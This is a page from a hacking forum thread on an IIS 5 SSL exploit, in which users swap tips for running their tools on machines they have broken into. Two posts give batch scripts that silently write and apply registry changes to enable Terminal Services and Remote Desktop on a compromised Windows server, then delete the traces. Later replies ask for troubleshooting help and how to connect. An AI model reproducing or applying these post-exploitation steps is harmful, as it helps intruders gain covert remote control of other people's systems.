hacking contest

hacking exploits security forum
hacking
compliance articles
upgrade backup exec
information security consultant

Full Version: Iis 5 Exploit Ssl
RizL4
hi there has anyone have trouble excuteing your files with this coz only some execute on mine just wanted too see if its just me thanxs
Nick
it can execute but 90 times on 100 u have a firewall blocking your toolz i think. if anyone have a solution for all the bad luck with outbound smile.gif)
Macsou
Your can execute your Files In remote Desktop , it's more easy .

To start the Terminal Service :

CODE
echo Windows Registry Editor Version 5.00> c:\TS.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]>> c:\TS.reg
echo "Start"=dword:00000002>> c:\TS.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]>>C:\TS.REG
echo "EnableAdminTSRemote"=dword:00000001>>C:\TS.REG
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]>>C:\TS.REG
echo "TSEnabled"=dword:00000001>>C:\TS.REG
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD]>>C:\TS.REG
echo "Start"=dword:00000002>>C:\TS.REG
REGEDIT /S C:\TS.REG
echo [Components] > c:\bootlog~.txt
echo TSEnabled = on >> c:\bootlog~.txt
sysocmgr /i:%windir%\inf\sysoc.inf /u:c:\bootlog~.txt /q
DEL /Q c:\TS.REG
DEL /Q c:\bootlog~.txt
EXIT


This is 4 Windows 2000 . But You can try : REGEDIT32 /S C:\TS.REG at the place of : REGEDIT /S C:\TS.REG

Nova
Macsou is this 2000 or XP, i have been using code i think i picked up here, but on some machines its not working, ?

CODE
echo Windows Registry Editor Version 5.00> c:\TS.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]>> c:\TS.reg
echo "fDenyTSConnections"=dword:00000000>> c:\TS.reg
echo "fAllowToGetHelp"=dword:00000000>> c:\TS.reg

regedit /s c:\TS.reg

del c:\TS.reg
tweakz20
you might have version problems because of the first line; echo Windows Registry Editor Version 5.00> c:\TS.reg
i know 2k (latest updates) uses v. 5.00, don't know about XP... don't know if it makes a difference though

we could help more if you would give an error message or something like that?
Crazycold
ok, i have done it, but now? how i will get the remote desktop what i have to do?
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.

 
Invision Power Board © 2001-2005 Invision Power Services, Inc.